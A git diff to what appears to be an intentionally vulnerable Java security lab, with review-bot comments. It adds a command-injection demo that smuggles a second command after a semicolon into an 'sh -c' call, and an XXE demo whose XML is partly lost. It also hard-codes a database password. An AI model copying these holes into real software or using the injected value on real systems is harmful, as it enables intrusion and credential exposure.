diff --git a/java-sec-code.iml b/java-sec-code.iml
deleted file mode 100644
index 5c58c92b..00000000
--- a/java-sec-code.iml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/java/org/joychou/cmd/testRun.java b/src/main/java/org/joychou/cmd/testRun.java
new file mode 100644
index 00000000..df861eb5
--- /dev/null
+++ b/src/main/java/org/joychou/cmd/testRun.java
@@ -0,0 +1,19 @@
+package org.joychou.cmd;
+
+import org.joychou.util.WebUtils;
+
+import java.io.IOException;
+
+public class testRun {
+ public static void main(String[] args) throws IOException {
+ String filepath = "/tmp; open /System/Applications/Calculator.app";
+ String[] cmdList = new String[]{"sh", "-c", "ls -la " + filepath};
+ //String[] cmdList = new String[]{"cmd.exe", "-c", "dir " + filepath};
+ ProcessBuilder builder = new ProcessBuilder(cmdList);
+ builder.redirectErrorStream(true);
+ Process process = builder.start();
+ String result = WebUtils.convertStreamToString(process.getInputStream());
+ System.out.println(result);
+ }
+
+}
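Review bot: `filepath` is concatenated into the string handed to `sh -c` in `cmdList`, so the shell parses everything after the `;` as a second command, and nothing in the file says whether that is an intentional demonstration. If it is, add a comment above `main` such as `// Intentionally vulnerable: sh -c interprets shell metacharacters in filepath` and put the safe form beside it, `new ProcessBuilder("ls", "-la", filepath)`, which passes the path as a single argument with no shell involved. The process is never waited on and its output stream is not closed. The class name `testRun` breaks the UpperCamelCase convention, and as a scratch runner it probably belongs under `src/test` rather than `src/main`.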
diff --git a/src/main/java/org/joychou/controller/TestXXE.java b/src/main/java/org/joychou/controller/TestXXE.java
new file mode 100644
index 00000000..5773270d
--- /dev/null
+++ b/src/main/java/org/joychou/controller/TestXXE.java
@@ -0,0 +1,30 @@
+package org.joychou.controller;
+
+import org.dom4j.Document;
+import org.dom4j.Node;
+import org.dom4j.io.SAXReader;
+
+import java.io.StringReader;
+
+public class TestXXE {
+ public static void main(String[] args) {
+ String xml = "\n" +
+ " ]>\n" +
+ "\n" +
+ "\n" +
+ "&xxe;\n" +
+ "test\n" +
+ "test\n" +
+ "\n" +
+ "";
+
+ try {
+ SAXReader reader = new SAXReader();
+ Document document = reader.read(new StringReader(xml));
+ Node node = document.selectSingleNode("//kpserver/Input/Nsrsbh_JX");
+ System.out.println(node.getText());
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
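Review bot: `new SAXReader()` in `main` is used with its default configuration, which does not refuse a DOCTYPE, so the `&xxe;` reference in the `xml` literal would be expanded by the parser. The literal's markup appears to have been lost on this page, so the entity definition itself is not visible. If the file is meant as a demonstration, say so in a comment and show the hardened reader next to it by calling `reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);` before `reader.read(...)`. `selectSingleNode` returns null when the path does not match, so `node.getText()` needs a null check, and `catch (Exception e)` with `printStackTrace()` hides which step failed.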
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 326a2b76..fd8897e8 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,7 +1,7 @@
spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
spring.datasource.username=root
-spring.datasource.password=woshishujukumima
+spring.datasource.password=zzz@2160
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.mapper-locations=classpath:mapper/*.xml
# mybatis SQL log
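Review bot: The `+` line replaces one hard-coded `spring.datasource.password` with another, and the new value reads like a real credential rather than a placeholder. Once committed it stays in history, so treat it as exposed and rotate it if it is used anywhere. Resolve it from the environment instead, e.g. `spring.datasource.password=${DB_PASSWORD}`, and keep local values in an untracked profile file. The unchanged context lines also connect as `root` with `useSSL=false`, which deserves a comment stating that this configuration is for a local lab database only.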
@@ -56,4 +56,4 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
# Fake aksk. Simulate actuator info leak.
jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
-jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
\ No newline at end of file
+jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7